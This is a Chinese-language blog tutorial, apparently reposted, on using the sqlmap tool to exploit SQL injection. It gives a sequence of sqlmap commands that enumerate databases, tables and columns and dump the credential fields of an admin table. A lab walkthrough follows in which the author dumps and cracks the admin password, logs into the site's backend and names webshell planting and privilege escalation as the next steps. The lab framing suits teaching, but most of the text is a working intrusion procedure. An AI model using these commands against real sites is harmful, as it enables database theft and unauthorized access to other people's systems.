美文网首页
sqlmap 使用教程

sqlmap 使用教程

作者: taiji1985 | 来源:发表于2017-12-18 13:24 被阅读4708次

检查注入点:

sqlmap -u http://aa.com/star_photo.php?artist_id=11

爆所有数据库信息:

sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs

爆当前数据库信息:

sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db

指定库名列出所有表

sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 --tables

'vhost48330' 为指定数据库名称

指定库名表名列出所有字段

sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
'admin' 为指定表名称

指定库名表名字段dump出指定字段

sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
'ac,id,password' 为指定字段名称

实验目的:

学会使用sqlmap并完成一次sql注入。

实验工具:

sqlmap、火狐浏览器
实验环境:

服务器一台(Windows server 2003)
客户机一台(Windows server 2003)、目标地址:http://aa.com/wcms/show.php?id=33

实验步骤:

python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3

image.png image.png
  • 第三步:获取数据库信息。

python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 --dbs

获取所有数据库信息

image.png image.png

获取当前数据库信息

由于靶机环境搭建了不同的网站和应用,用的都是同一个数据库,因此显示的会把整个mysql的所有数据库名都显示出来。目标网站用的是cms这个库。
第四步:指定库名列出所有表

image.png

进一步获取到了cms库所有的表,我们更关注cms_users这个表。根据经验,这里面存储着后台的管理账号和密码。

image.png
image.png
  • 第五步:指定库名表名列出所有字段。

-python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 -D cms -T cms_users --columns

image.png
image.png

查出了3个字段,password,userid,username。理论上password、和username分别存储着密码和用户名。

  • 第六步:指定库名表名字段列出指定字段

python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 -D cms -T cms_users -C username,password --dump

image.png image.png

在执行过程中,会需要我们属于选择一下y或者n,默认的是大写选项,默认即可(一直按Enter键即可);主要是sqlmap调用本地字典库进行简单的md5暴力破解。我们最后获取到了用户名和密码,分别是 admin 和123456。
第七步:在后台登陆一下。至于后台的查找,我们可以通过御剑这款专业的后台查找工具,后续实验中会有详细的介绍,这里不再赘述。

http://aa.com/wcms/admin/login.php

输入用户名和密码 admin 123456

登陆成功。
关于sqlmap的入侵整个实验过程已经结束,后续的工作就是挂马提权,这些内容也会在后续的实验中进行详细的介绍。

别人家的孩子
https://www.jianshu.com/p/4fb15a2c9040

相关文章

网友评论

      本文标题:sqlmap 使用教程

      本文链接:https://www.haomeiwen.com/subject/datmwxtx.html